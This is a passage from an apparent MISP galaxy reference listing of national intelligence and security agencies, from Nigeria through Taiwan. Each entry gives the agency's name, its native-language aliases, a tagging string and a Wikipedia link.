https://en.wikipedia.org/wiki/National_Intelligence_Agency_(Nigeria)

Defence Intelligence Agency (Nigeria)

Defence Intelligence Agency (Military Intelligence)

The tag is: misp-galaxy:intelligence-agency="Defence Intelligence Agency (Nigeria)"

Table 1864. Table References

Links

https://en.wikipedia.org/wiki/Defence_Intelligence_Agency_(Nigeria)

State Security Service (Nigeria)

State Security Service (Internal Security)

The tag is: misp-galaxy:intelligence-agency="State Security Service (Nigeria)"

Table 1865. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Service_(Nigeria)

Reconnaissance General Bureau

Reconnaissance General Bureau[21]

The tag is: misp-galaxy:intelligence-agency="Reconnaissance General Bureau"

Table 1866. Table References

Links

https://en.wikipedia.org/wiki/Reconnaissance_General_Bureau

Ministry of State Security (North Korea)

Ministry of State Security[22]

The tag is: misp-galaxy:intelligence-agency="Ministry of State Security (North Korea)"

Table 1867. Table References

Links

https://en.wikipedia.org/wiki/Ministry_of_State_Security_(North_Korea)

Administration for Security and Counterintelligence

Administration for Security and Counterintelligence (Uprava za bezbednost i kontrarazuznavanje) (Police Agency)

The tag is: misp-galaxy:intelligence-agency="Administration for Security and Counterintelligence"

Administration for Security and Counterintelligence is also known as:

  • Uprava za bezbednost i kontrarazuznavanje

Table 1868. Table References

Links

https://en.wikipedia.org/wiki/Administration_for_Security_and_Counterintelligence

Intelligence Agency of North Macedonia

Intelligence Agency (Agencija za Razuznavanje) (Civilian Agency) IA

The tag is: misp-galaxy:intelligence-agency="Intelligence Agency of North Macedonia"

Intelligence Agency of North Macedonia is also known as:

  • Agencija za Razuznavanje

Table 1869. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Agency_of_North_Macedonia

Military Service for Security and Intelligence

Military Service for Security and Intelligence (Voena služba za razuznuvanje i bezbednost) (Military Agency) [1]

The tag is: misp-galaxy:intelligence-agency="Military Service for Security and Intelligence"

Military Service for Security and Intelligence is also known as:

  • Voena služba za razuznuvanje i bezbednost

Table 1870. Table References

Links

https://en.wikipedia.org/wiki/Military_Service_for_Security_and_Intelligence

Nasjonal sikkerhetsmyndighet

Nasjonal sikkerhetsmyndighet (NSM) (National Security Authority)

The tag is: misp-galaxy:intelligence-agency="Nasjonal sikkerhetsmyndighet"

Table 1871. Table References

Links

https://en.wikipedia.org/wiki/Nasjonal_sikkerhetsmyndighet

Politiets sikkerhetstjeneste

Politiets sikkerhetstjeneste (PST) (Police Security Service)

The tag is: misp-galaxy:intelligence-agency="Politiets sikkerhetstjeneste"

Table 1872. Table References

Links

https://en.wikipedia.org/wiki/Politiets_sikkerhetstjeneste

Etterretningstjenesten

Etterretningstjenesten (NIS) (Norwegian Intelligence Service)

The tag is: misp-galaxy:intelligence-agency="Etterretningstjenesten"

Table 1873. Table References

Links

https://en.wikipedia.org/wiki/Etterretningstjenesten

Forsvarets sikkerhetstjeneste

Forsvarets sikkerhetstjeneste (FOST) – Norwegian Defence Security Service (NORDSS)

The tag is: misp-galaxy:intelligence-agency="Forsvarets sikkerhetstjeneste"

Table 1874. Table References

Links

https://en.wikipedia.org/wiki/Forsvarets_sikkerhetstjeneste

Palace Office (Oman)

The Palace Office [Foreign Intelligence]

The tag is: misp-galaxy:intelligence-agency="Palace Office (Oman)"

Table 1875. Table References

Links

https://en.wikipedia.org/wiki/Palace_Office_(Oman)

Internal Security Service

Internal Security Service [Internal Security]

The tag is: misp-galaxy:intelligence-agency="Internal Security Service"

Table 1876. Table References

Links

https://en.wikipedia.org/wiki/Internal_Security_Service

Inter-Services Intelligence

Inter-Services Intelligence (ISI)

The tag is: misp-galaxy:intelligence-agency="Inter-Services Intelligence"

Table 1877. Table References

Links

https://en.wikipedia.org/wiki/Inter-Services_Intelligence

Air Intelligence (Pakistan)

Air Intelligence (AI)

The tag is: misp-galaxy:intelligence-agency="Air Intelligence (Pakistan)"

Table 1878. Table References

Links

https://en.wikipedia.org/wiki/Air_Intelligence_(Pakistan)

Military Intelligence (Pakistan)

Military Intelligence (MI)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence (Pakistan)"

Table 1879. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_(Pakistan)

Naval Intelligence (Pakistan)

Naval Intelligence (NI)

The tag is: misp-galaxy:intelligence-agency="Naval Intelligence (Pakistan)"

Table 1880. Table References

Links

https://en.wikipedia.org/wiki/Naval_Intelligence_(Pakistan)

Intelligence Bureau (Pakistan)

Intelligence Bureau (IB)

The tag is: misp-galaxy:intelligence-agency="Intelligence Bureau (Pakistan)"

Table 1881. Table References

Links

https://en.wikipedia.org/wiki/Intelligence_Bureau_(Pakistan)

Federal Investigation Agency

Federal Investigation Agency (FIA)

The tag is: misp-galaxy:intelligence-agency="Federal Investigation Agency"

Table 1882. Table References

Links

https://en.wikipedia.org/wiki/Federal_Investigation_Agency

National Counter Terrorism Authority

National Counter Terrorism Authority (NACTA)

The tag is: misp-galaxy:intelligence-agency="National Counter Terrorism Authority"

Table 1883. Table References

Links

https://en.wikipedia.org/wiki/National_Counter_Terrorism_Authority

Counter Terrorism Department (Pakistan)

Counter Terrorism Department (CTD)

The tag is: misp-galaxy:intelligence-agency="Counter Terrorism Department (Pakistan)"

Table 1884. Table References

Links

https://en.wikipedia.org/wiki/Counter_Terrorism_Department_(Pakistan)

National Intelligence Directorate (Pakistan)

National Intelligence Directorate (NID)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Directorate (Pakistan)"

Table 1885. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Directorate_(Pakistan)

Special Branch (Pakistan)

Special Branch (Pakistan)

The tag is: misp-galaxy:intelligence-agency="Special Branch (Pakistan)"

Table 1886. Table References

Links

https://en.wikipedia.org/wiki/Special_Branch_(Pakistan)

Directorate General of Intelligence and Investigation

Directorate-General of Intelligence and Investigation (DGII)

The tag is: misp-galaxy:intelligence-agency="Directorate General of Intelligence and Investigation"

Table 1887. Table References

Links

https://en.wikipedia.org/wiki/Directorate_General_of_Intelligence_and_Investigation

Financial Monitoring Unit

Financial Monitoring Unit (FMU)

The tag is: misp-galaxy:intelligence-agency="Financial Monitoring Unit"

Table 1888. Table References

Links

https://en.wikipedia.org/wiki/Financial_Monitoring_Unit

National Accountability Bureau

National Accountability Bureau (NAB)

The tag is: misp-galaxy:intelligence-agency="National Accountability Bureau"

Table 1889. Table References

Links

https://en.wikipedia.org/wiki/National_Accountability_Bureau

Security and Exchange Commission of Pakistan

Security and Exchange Commission Pakistan (SECP)

The tag is: misp-galaxy:intelligence-agency="Security and Exchange Commission of Pakistan"

Table 1890. Table References

Links

https://en.wikipedia.org/wiki/Security_and_Exchange_Commission_of_Pakistan

Anti-Narcotics Force

Anti-Narcotics Force (ANF)

The tag is: misp-galaxy:intelligence-agency="Anti-Narcotics Force"

Table 1891. Table References

Links

https://en.wikipedia.org/wiki/Anti-Narcotics_Force

National Crises Management Cell

National Crises Management Cell (NCMC)

The tag is: misp-galaxy:intelligence-agency="National Crises Management Cell"

Table 1892. Table References

Links

https://en.wikipedia.org/wiki/National_Crises_Management_Cell

Palestinian Preventive Security

Palestinian Preventive Security (internal security)

The tag is: misp-galaxy:intelligence-agency="Palestinian Preventive Security"

Table 1893. Table References

Links

https://en.wikipedia.org/wiki/Palestinian_Preventive_Security

Palestinian National Security Forces

Palestinian National Security Forces

The tag is: misp-galaxy:intelligence-agency="Palestinian National Security Forces"

Table 1894. Table References

Links

https://en.wikipedia.org/wiki/Palestinian_National_Security_Forces

National Police Intelligence Directorate

National Police Intelligence Directorate (DNIP) – Dirección Nacional de Inteligencia Policial

The tag is: misp-galaxy:intelligence-agency="National Police Intelligence Directorate"

Table 1895. Table References

Links

https://en.wikipedia.org/wiki/National_Police_Intelligence_Directorate

General Directorate of Analysis and Strategic Intelligence (Panama) (page does not exist)

General Directorate of Analysis and Strategic Intelligence - Direccion General de Analisis e Inteligencia Estrategica (DGAIE)[23]

The tag is: misp-galaxy:intelligence-agency="General Directorate of Analysis and Strategic Intelligence (Panama) (page does not exist)"

Table 1896. Table References

Links

https://en.wikipedia.org/w/index.php?title=General_Directorate_of_Analysis_and_Strategic_Intelligence_(Panama)&action=edit&redlink=1

National Intelligence and Security Service (Panama) (page does not exist)

National Intelligence and Security Service - Servicio Nacional de Inteligencia y Seguridad (SENIS)[24]

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Service (Panama) (page does not exist)"

Table 1897. Table References

Links

https://en.wikipedia.org/w/index.php?title=National_Intelligence_and_Security_Service_(Panama)&action=edit&redlink=1

National Intelligence Organization (Papua New Guinea)

National Intelligence Organization (NIO)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Organization (Papua New Guinea)"

Table 1898. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Organization_(Papua_New_Guinea)

National Directorate of Intelligence (Peru)

National Directorate of Intelligence - Dirección Nacional de Inteligencia (DINI)

The tag is: misp-galaxy:intelligence-agency="National Directorate of Intelligence (Peru)"

Table 1899. Table References

Links

https://en.wikipedia.org/wiki/National_Directorate_of_Intelligence_(Peru)

National Intelligence Coordinating Agency

National Intelligence Coordinating Agency (NICA) – Pambansang Ahensiya sa Ugnayang Intelihensiya

The tag is: misp-galaxy:intelligence-agency="National Intelligence Coordinating Agency"

National Intelligence Coordinating Agency is also known as:

  • Pambansang Ahensiya sa Ugnayang Intelihensiya

Table 1900. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Coordinating_Agency

National Bureau of Investigation (Philippines)

National Bureau of Investigation (NBI) – Pambansang Kawanihan ng Pagsisiyasat

The tag is: misp-galaxy:intelligence-agency="National Bureau of Investigation (Philippines)"

National Bureau of Investigation (Philippines) is also known as:

  • Pambansang Kawanihan ng Pagsisiyasat

Table 1901. Table References

Links

https://en.wikipedia.org/wiki/National_Bureau_of_Investigation_(Philippines)

Agencja Wywiadu

Foreign Intelligence Agency - Agencja Wywiadu (AW)

The tag is: misp-galaxy:intelligence-agency="Agencja Wywiadu"

Table 1902. Table References

Links

https://en.wikipedia.org/wiki/Agencja_Wywiadu

Agencja Bezpieczeństwa Wewnętrznego

Internal Security Agency - Agencja Bezpieczeństwa Wewnętrznego (ABW)

The tag is: misp-galaxy:intelligence-agency="Agencja Bezpieczeństwa Wewnętrznego"

Table 1903. Table References

Links

https://en.wikipedia.org/wiki/Agencja_Bezpiecze%C5%84stwa_Wewn%C4%99trznego

Służba Wywiadu Wojskowego (page does not exist)

Military Intelligence Service - Służba Wywiadu Wojskowego (SWW)

The tag is: misp-galaxy:intelligence-agency="Służba Wywiadu Wojskowego (page does not exist)"

Table 1904. Table References

Links

https://en.wikipedia.org/w/index.php?title=S%C5%82u%C5%BCba_Wywiadu_Wojskowego&action=edit&redlink=1

Służba Kontrwywiadu Wojskowego

Military Counter-intelligence Service - Służba Kontrwywiadu Wojskowego (SKW)

The tag is: misp-galaxy:intelligence-agency="Służba Kontrwywiadu Wojskowego"

Table 1905. Table References

Links

https://en.wikipedia.org/wiki/S%C5%82u%C5%BCba_Kontrwywiadu_Wojskowego

Border Guard (Poland)

Operations and Investigations Directorate of the Border Guard Headquarters - Zarząd Operacyjno-Śledczy Komendy Głównej Straży Granicznej (KGSG, ZOŚ, KGSG)

The tag is: misp-galaxy:intelligence-agency="Border Guard (Poland)"

Table 1906. Table References

Links

https://en.wikipedia.org/wiki/Border_Guard_(Poland)

Serviço de Informações de Segurança

Security Intelligence Service - Serviço de Informações de Segurança (SIS)

The tag is: misp-galaxy:intelligence-agency="Serviço de Informações de Segurança"

Table 1907. Table References

Links

https://en.wikipedia.org/wiki/Servi%C3%A7o_de_Informa%C3%A7%C3%B5es_de_Seguran%C3%A7a

Serviço de Informações Estratégicas de Defesa

Defense Strategic Intelligence Service - Serviço de Informações Estratégicas de Defesa (SIED)

The tag is: misp-galaxy:intelligence-agency="Serviço de Informações Estratégicas de Defesa"

Table 1908. Table References

Links

https://en.wikipedia.org/wiki/Servi%C3%A7o_de_Informa%C3%A7%C3%B5es_Estrat%C3%A9gicas_de_Defesa

CISMIL

Military Intelligence and Security Service - Centro de Informações e Segurança Militares (CISMIL)

The tag is: misp-galaxy:intelligence-agency="CISMIL"

Table 1909. Table References

Links

https://en.wikipedia.org/wiki/CISMIL

Qatar State Security

Qatar State Security

The tag is: misp-galaxy:intelligence-agency="Qatar State Security"

Table 1910. Table References

Links

https://en.wikipedia.org/wiki/Qatar_State_Security

Romanian Intelligence Service

Romanian Intelligence Service (SRI) – Serviciul Român de Informații

The tag is: misp-galaxy:intelligence-agency="Romanian Intelligence Service"

Romanian Intelligence Service is also known as:

  • Serviciul Român de Informații

Table 1911. Table References

Links

https://en.wikipedia.org/wiki/Romanian_Intelligence_Service

Foreign Intelligence Service (Romania)

Foreign Intelligence Service (SIE) – Serviciul de Informații Externe

The tag is: misp-galaxy:intelligence-agency="Foreign Intelligence Service (Romania)"

Foreign Intelligence Service (Romania) is also known as:

  • Serviciul de Informații Externe

Table 1912. Table References

Links

https://en.wikipedia.org/wiki/Foreign_Intelligence_Service_(Romania)

Serviciul de Telecomunicații Speciale

Special Telecommunication Service (STS) – Serviciul de Telecomunicații Speciale

The tag is: misp-galaxy:intelligence-agency="Serviciul de Telecomunicații Speciale"

Table 1913. Table References

Links

https://en.wikipedia.org/wiki/Serviciul_de_Telecomunica%C8%9Bii_Speciale

Direcția Generală de Informații a Apărării

General Directorate for Defense Intelligence (DGIA) – Direcția Generală de Informații a Apărării

The tag is: misp-galaxy:intelligence-agency="Direcția Generală de Informații a Apărării"

Table 1914. Table References

Links

https://en.wikipedia.org/wiki/Direc%C8%9Bia_General%C4%83_de_Informa%C8%9Bii_a_Ap%C4%83r%C4%83rii

Direcția Generală de Informații și Protecție Internă

General Directorate for Internal Security (DGPI) – Direcția Generală de Protecție Internă

The tag is: misp-galaxy:intelligence-agency="Direcția Generală de Informații și Protecție Internă"

Direcția Generală de Informații și Protecție Internă is also known as:

  • Direcția Generală de Protecție Internă

Table 1915. Table References

Links

https://en.wikipedia.org/wiki/Direc%C8%9Bia_General%C4%83_de_Informa%C8%9Bii_%C8%99i_Protec%C8%9Bie_Intern%C4%83

Federal Security Service (Russia)

Federal Security Service (FSB) – Федеральная служба безопасности

The tag is: misp-galaxy:intelligence-agency="Federal Security Service (Russia)"

Federal Security Service (Russia) is also known as:

  • Федеральная служба безопасности

Table 1916. Table References

Links

https://en.wikipedia.org/wiki/Federal_Security_Service_(Russia)

Main Directorate of Special Programs of the President of the Russian Federation

Main Directorate of Special Programs of the President of the Russian Federation (GUSP) – Главное управление специальных программ Президента Российской Федерации

The tag is: misp-galaxy:intelligence-agency="Main Directorate of Special Programs of the President of the Russian Federation"

Main Directorate of Special Programs of the President of the Russian Federation is also known as:

  • Главное управление специальных программ Президента Российской Федерации

Table 1917. Table References

Links

https://en.wikipedia.org/wiki/Main_Directorate_of_Special_Programs_of_the_President_of_the_Russian_Federation

Foreign Intelligence Service (Russia)

Foreign Intelligence Service (Russia) (SVR) – Служба Внешней Разведки

The tag is: misp-galaxy:intelligence-agency="Foreign Intelligence Service (Russia)"

Foreign Intelligence Service (Russia) is also known as:

  • Служба Внешней Разведки

Table 1918. Table References

Links

https://en.wikipedia.org/wiki/Foreign_Intelligence_Service_(Russia)

GRU (Russian Federation)

Main Intelligence Directorate (GRU) – Главное Разведывательное Управление

The tag is: misp-galaxy:intelligence-agency="GRU (Russian Federation)"

GRU (Russian Federation) is also known as:

  • Главное Разведывательное Управление

Table 1919. Table References

Links

https://en.wikipedia.org/wiki/GRU_(Russian_Federation)

Special Communications Service of Russia

Special Communications Service of Russia – Служба специальной связи и информации

The tag is: misp-galaxy:intelligence-agency="Special Communications Service of Russia"

Special Communications Service of Russia is also known as:

  • Служба специальной связи и информации

Table 1920. Table References

Links

https://en.wikipedia.org/wiki/Special_Communications_Service_of_Russia

National Intelligence and Security Service (Rwanda)

National Intelligence and Security Service (Rwanda)

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Service (Rwanda)"

Table 1921. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_and_Security_Service_(Rwanda)

Council of Political and Security Affairs (Saudi Arabia)

Council of Political and Security Affairs (CPSA) – مجلس الشؤون السياسية والأمنية

The tag is: misp-galaxy:intelligence-agency="Council of Political and Security Affairs (Saudi Arabia)"

Table 1922. Table References

Links

https://en.wikipedia.org/wiki/Council_of_Political_and_Security_Affairs_(Saudi_Arabia)

Al Mukhabarat Al A’amah

General Intelligence Presidency (GIP) – رئاسة الاستخبارات العامة

The tag is: misp-galaxy:intelligence-agency="Al Mukhabarat Al A’amah"

Table 1923. Table References

Links

https://en.wikipedia.org/wiki/Al_Mukhabarat_Al_A%27amah

Mabahith

Mabahith (GDI) – المباحث العامة

The tag is: misp-galaxy:intelligence-agency="Mabahith"

Table 1924. Table References

Links

https://en.wikipedia.org/wiki/Mabahith

Saudi Arabian Border Guards

Saudi Arabia Border Guards Intelligence Directorate – استخبارات حرس الحدود

The tag is: misp-galaxy:intelligence-agency="Saudi Arabian Border Guards"

Table 1925. Table References

Links

https://en.wikipedia.org/wiki/Saudi_Arabian_Border_Guards

The National Cyber Security Commission[25] (NCSC) – الهيئة الوطنية للأمن السيبراني

The National Cyber Security Commission[25] (NCSC) – الهيئة الوطنية للأمن السيبراني

The tag is: misp-galaxy:intelligence-agency="The National Cyber Security Commission[25] (NCSC) – الهيئة الوطنية للأمن السيبراني"

Table 1926. Table References

Links

https://en.wikipedia.org#cite_note-25

Security Intelligence Agency

Security Intelligence Agency – Безбедносно-информативна агенција (BIA)

The tag is: misp-galaxy:intelligence-agency="Security Intelligence Agency"

Table 1927. Table References

Links

https://en.wikipedia.org/wiki/Security_Intelligence_Agency

Military Security Agency (Serbia)

Military Security Agency – Војнобезбедносна агенција (VBA)

The tag is: misp-galaxy:intelligence-agency="Military Security Agency (Serbia)"

Table 1928. Table References

Links

https://en.wikipedia.org/wiki/Military_Security_Agency_(Serbia)

Vojnoobaveštajna agencija

Military Intelligence Agency – Војнообавештајна агенција (VOA)

The tag is: misp-galaxy:intelligence-agency="Vojnoobaveštajna agencija"

Table 1929. Table References

Links

https://en.wikipedia.org/wiki/Vojnoobave%C5%A1tajna_agencija

Security and Intelligence Division

Security and Intelligence Division (SID)

The tag is: misp-galaxy:intelligence-agency="Security and Intelligence Division"

Table 1930. Table References

Links

https://en.wikipedia.org/wiki/Security_and_Intelligence_Division

Internal Security Department (Singapore)

Internal Security Department (ISD)

The tag is: misp-galaxy:intelligence-agency="Internal Security Department (Singapore)"

Table 1931. Table References

Links

https://en.wikipedia.org/wiki/Internal_Security_Department_(Singapore)

Slovak Information Service

Slovak Information Service - Slovenská informačná služba (SIS)

The tag is: misp-galaxy:intelligence-agency="Slovak Information Service"

Table 1932. Table References

Links

https://en.wikipedia.org/wiki/Slovak_Information_Service

Vojenské spravodajstvo

Military Intelligence - Vojenské spravodajstvo

The tag is: misp-galaxy:intelligence-agency="Vojenské spravodajstvo"

Table 1933. Table References

Links

https://en.wikipedia.org/wiki/Vojensk%C3%A9_spravodajstvo

National Security Bureau (Slovakia)

National Security Bureau - Národný bezpečnostný úrad (NBÚ)

The tag is: misp-galaxy:intelligence-agency="National Security Bureau (Slovakia)"

Table 1934. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Bureau_(Slovakia)

Slovenska Obveščevalno-Varnostna Agencija

Slovenian Intelligence and Security Agency - Slovenska Obveščevalno-Varnostna Agencija (SOVA)

The tag is: misp-galaxy:intelligence-agency="Slovenska Obveščevalno-Varnostna Agencija"

Table 1935. Table References

Links

https://en.wikipedia.org/wiki/Slovenska_Obve%C5%A1%C4%8Devalno-Varnostna_Agencija

Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]

Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]

The tag is: misp-galaxy:intelligence-agency="Intelligence and Security Service of Slovenian Ministry of Defence - Obveščevalno Varnostna Služba (OVS)[26]"

Table 1936. Table References

Links

https://en.wikipedia.org#cite_note-26

General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)[27]

General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)[27]

The tag is: misp-galaxy:intelligence-agency="General Staff SAF – Section for intelligence matters – J2 - General štab SV – Sektor za obveščevalne zadeve – J2 (GŠSV-J2)[27]"

Table 1937. Table References

Links

https://en.wikipedia.org#cite_note-27

National Intelligence and Security Agency

National Intelligence and Security Agency (NISA)

The tag is: misp-galaxy:intelligence-agency="National Intelligence and Security Agency"

Table 1938. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_and_Security_Agency

State Security Agency (South Africa)

State Security Agency (SSA)

The tag is: misp-galaxy:intelligence-agency="State Security Agency (South Africa)"

Table 1939. Table References

Links

https://en.wikipedia.org/wiki/State_Security_Agency_(South_Africa)

South African National Defence Force Intelligence Division

South African National Defence Force, Intelligence Division (SANDF-ID)

The tag is: misp-galaxy:intelligence-agency="South African National Defence Force Intelligence Division"

Table 1940. Table References

Links

https://en.wikipedia.org/wiki/South_African_National_Defence_Force_Intelligence_Division

Crime Intelligence (SAPS)

Crime Intelligence Division, South African Police Service

The tag is: misp-galaxy:intelligence-agency="Crime Intelligence (SAPS)"

Table 1941. Table References

Links

https://en.wikipedia.org/wiki/Crime_Intelligence_(SAPS)

National Intelligence Service (South Korea)

National Intelligence Service (NIS)

The tag is: misp-galaxy:intelligence-agency="National Intelligence Service (South Korea)"

Table 1942. Table References

Links

https://en.wikipedia.org/wiki/National_Intelligence_Service_(South_Korea)

Defense Intelligence Agency (South Korea)

Defense Intelligence Agency (DIA)

The tag is: misp-galaxy:intelligence-agency="Defense Intelligence Agency (South Korea)"

Table 1943. Table References

Links

https://en.wikipedia.org/wiki/Defense_Intelligence_Agency_(South_Korea)

Defence Intelligence Command (page does not exist)

Defence Intelligence Command [ko] (DIC)

The tag is: misp-galaxy:intelligence-agency="Defence Intelligence Command (page does not exist)"

Table 1944. Table References

Links

https://en.wikipedia.org/w/index.php?title=Defence_Intelligence_Command&action=edit&redlink=1

Defense Security Support Command (page does not exist)

Defense Security Support Command [ko] (DSSC)

The tag is: misp-galaxy:intelligence-agency="Defense Security Support Command (page does not exist)"

Table 1945. Table References

Links

https://en.wikipedia.org/w/index.php?title=Defense_Security_Support_Command&action=edit&redlink=1

Department of Homeland Security (Spain)

Department of Homeland Security (DSN)

The tag is: misp-galaxy:intelligence-agency="Department of Homeland Security (Spain)"

Table 1946. Table References

Links

https://en.wikipedia.org/wiki/Department_of_Homeland_Security_(Spain)

National Cryptologic Center

National Cryptologic Center - (Centro Criptológico Nacional) (CCN)

The tag is: misp-galaxy:intelligence-agency="National Cryptologic Center"

Table 1947. Table References

Links

https://en.wikipedia.org/wiki/National_Cryptologic_Center

Spanish Armed Forces Intelligence Center

Armed Forces Intelligence Center (CIFAS)

The tag is: misp-galaxy:intelligence-agency="Spanish Armed Forces Intelligence Center"

Table 1948. Table References

Links

https://en.wikipedia.org/wiki/Spanish_Armed_Forces_Intelligence_Center

Joint Cyberspace Command

Joint Cyberspace Command (MCCE)

The tag is: misp-galaxy:intelligence-agency="Joint Cyberspace Command"

Table 1949. Table References

Links

https://en.wikipedia.org/wiki/Joint_Cyberspace_Command

Centro de Inteligencia contra el Terrorismo y el Crimen Organizado

Intelligence Center for Counter-Terrorism and Organized Crime - (Centro de Inteligencia contra el Terrorismo y el Crimen Organizado) (CITCO)

The tag is: misp-galaxy:intelligence-agency="Centro de Inteligencia contra el Terrorismo y el Crimen Organizado"

Table 1950. Table References

Links

https://en.wikipedia.org/wiki/Centro_de_Inteligencia_contra_el_Terrorismo_y_el_Crimen_Organizado

Brigada de Investigación Tecnológica

Technological Research Brigade (BIT)

The tag is: misp-galaxy:intelligence-agency="Brigada de Investigación Tecnológica"

Table 1951. Table References

Links

https://en.wikipedia.org/wiki/Brigada_de_Investigaci%C3%B3n_Tecnol%C3%B3gica

General Commissariat of Information

General Commissariat of Information - (Comisaría General de la Información) (CGI)

The tag is: misp-galaxy:intelligence-agency="General Commissariat of Information"

Table 1952. Table References

Links

https://en.wikipedia.org/wiki/General_Commissariat_of_Information

General Commissariat of Judiciary Police

General Commissariat of Judiciary Police - (Comisaría General de Policía Judicial) (CGPJ)

The tag is: misp-galaxy:intelligence-agency="General Commissariat of Judiciary Police"

Table 1953. Table References

Links

https://en.wikipedia.org/wiki/General_Commissariat_of_Judiciary_Police

State Intelligence Service (Sri Lanka)

State Intelligence Service (Sri Lanka)

The tag is: misp-galaxy:intelligence-agency="State Intelligence Service (Sri Lanka)"

Table 1954. Table References

Links

https://en.wikipedia.org/wiki/State_Intelligence_Service_(Sri_Lanka)

Special Branch (Sri Lanka)

Special Branch

The tag is: misp-galaxy:intelligence-agency="Special Branch (Sri Lanka)"

Terrorist Investigation Division

Terrorist Investigation Division

The tag is: misp-galaxy:intelligence-agency="Terrorist Investigation Division"

Criminal Investigation Department (Sri Lanka)

Criminal Investigation Department (Sri Lanka)

The tag is: misp-galaxy:intelligence-agency="Criminal Investigation Department (Sri Lanka)"

Table 1955. Table References

Links

https://en.wikipedia.org/wiki/Criminal_Investigation_Department_(Sri_Lanka)

Financial Crimes Investigation Division

Financial Crimes Investigation Division

The tag is: misp-galaxy:intelligence-agency="Financial Crimes Investigation Division"

Table 1956. Table References

Links

https://en.wikipedia.org/wiki/Financial_Crimes_Investigation_Division

Directorate of Military Intelligence (Sri Lanka)

Directorate of Military Intelligence (Sri Lanka)

The tag is: misp-galaxy:intelligence-agency="Directorate of Military Intelligence (Sri Lanka)"

Table 1957. Table References

Links

https://en.wikipedia.org/wiki/Directorate_of_Military_Intelligence_(Sri_Lanka)

Military Intelligence Corps (Sri Lanka)

Military Intelligence Corps (Sri Lanka)

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Corps (Sri Lanka)"

Table 1958. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_Corps_(Sri_Lanka)

Department of Naval Intelligence

Department of Naval Intelligence

The tag is: misp-galaxy:intelligence-agency="Department of Naval Intelligence"

Directorate of Air Intelligence

Directorate of Air Intelligence

The tag is: misp-galaxy:intelligence-agency="Directorate of Air Intelligence"

Financial Intelligence Unit (Sri Lanka),

Financial Intelligence Unit (Sri Lanka),

The tag is: misp-galaxy:intelligence-agency="Financial Intelligence Unit (Sri Lanka),"

General Intelligence Service (Sudan)

General Intelligence Service

The tag is: misp-galaxy:intelligence-agency="General Intelligence Service (Sudan)"

Table 1959. Table References

Links

https://en.wikipedia.org/wiki/General_Intelligence_Service_(Sudan)

Kontoret för särskild inhämtning

Office for Special Acquisition – Kontoret för särskild inhämtning (KSI)

The tag is: misp-galaxy:intelligence-agency="Kontoret för särskild inhämtning"

Table 1960. Table References

Links

https://en.wikipedia.org/wiki/Kontoret_f%C3%B6r_s%C3%A4rskild_inh%C3%A4mtning

National Defence Radio Establishment

National Defence Radio Establishment – Försvarets Radioanstalt (FRA)

The tag is: misp-galaxy:intelligence-agency="National Defence Radio Establishment"

Table 1961. Table References

Links

https://en.wikipedia.org/wiki/National_Defence_Radio_Establishment

Swedish Security Service

Swedish Security Service – Säkerhetspolisen (Säpo)

The tag is: misp-galaxy:intelligence-agency="Swedish Security Service"

Table 1962. Table References

Links

https://en.wikipedia.org/wiki/Swedish_Security_Service

Swiss intelligence agencies

Federal Intelligence Service - Nachrichtendienst des Bundes (NDB)

The tag is: misp-galaxy:intelligence-agency="Swiss intelligence agencies"

Table 1963. Table References

Links

https://en.wikipedia.org/wiki/Swiss_intelligence_agencies

Militärischer Nachrichtendienst

Military Intelligence Service - Militärischer Nachrichtendienst (MND)

The tag is: misp-galaxy:intelligence-agency="Militärischer Nachrichtendienst"

Table 1964. Table References

Links

https://en.wikipedia.org/wiki/Milit%C3%A4rischer_Nachrichtendienst

Air Force Intelligence Directorate

Air Force Intelligence Directorate

The tag is: misp-galaxy:intelligence-agency="Air Force Intelligence Directorate"

Table 1965. Table References

Links

https://en.wikipedia.org/wiki/Air_Force_Intelligence_Directorate

General Intelligence Directorate (Syria)

General Intelligence Directorate

The tag is: misp-galaxy:intelligence-agency="General Intelligence Directorate (Syria)"

Table 1966. Table References

Links

https://en.wikipedia.org/wiki/General_Intelligence_Directorate_(Syria)

Political Security Directorate

Political Security Directorate

The tag is: misp-galaxy:intelligence-agency="Political Security Directorate"

Table 1967. Table References

Links

https://en.wikipedia.org/wiki/Political_Security_Directorate

Military Intelligence Directorate (Syria)

Military Intelligence Directorate

The tag is: misp-galaxy:intelligence-agency="Military Intelligence Directorate (Syria)"

Table 1968. Table References

Links

https://en.wikipedia.org/wiki/Military_Intelligence_Directorate_(Syria)

National Security Bureau (Republic of China)

National Security Bureau (NSB)

The tag is: misp-galaxy:intelligence-agency="National Security Bureau (Republic of China)"

Table 1969. Table References

Links

https://en.wikipedia.org/wiki/National_Security_Bureau_(Republic_of_China)

Bureau of Investigation (Taiwan)

Investigation Bureau (MJIB)

The tag is: misp-galaxy:intelligence-agency="Bureau of Investigation (Taiwan)"

Table 1970. Table References

Links

https://en.wikipedia.org/wiki/Bureau_of_Investigation_(Taiwan)

National Police Agency of the ROC (Taiwan)

National Police Agency (NPA)

The tag is: misp-galaxy:intelligence-agency="National Police Agency of the ROC (Taiwan)"

Table 1971. Table References

Links

https://en.wikipedia.org/wiki/National_Police_Agency_of_the_ROC_(Taiwan)

Republic of China Military Police

Military Police Command (ROCMP)

The tag is: misp-galaxy:intelligence-agency="Republic of China Military Police"

Table 1972. Table References

Links

https://en.wikipedia.org/wiki/Republic_of_China_Military_Police

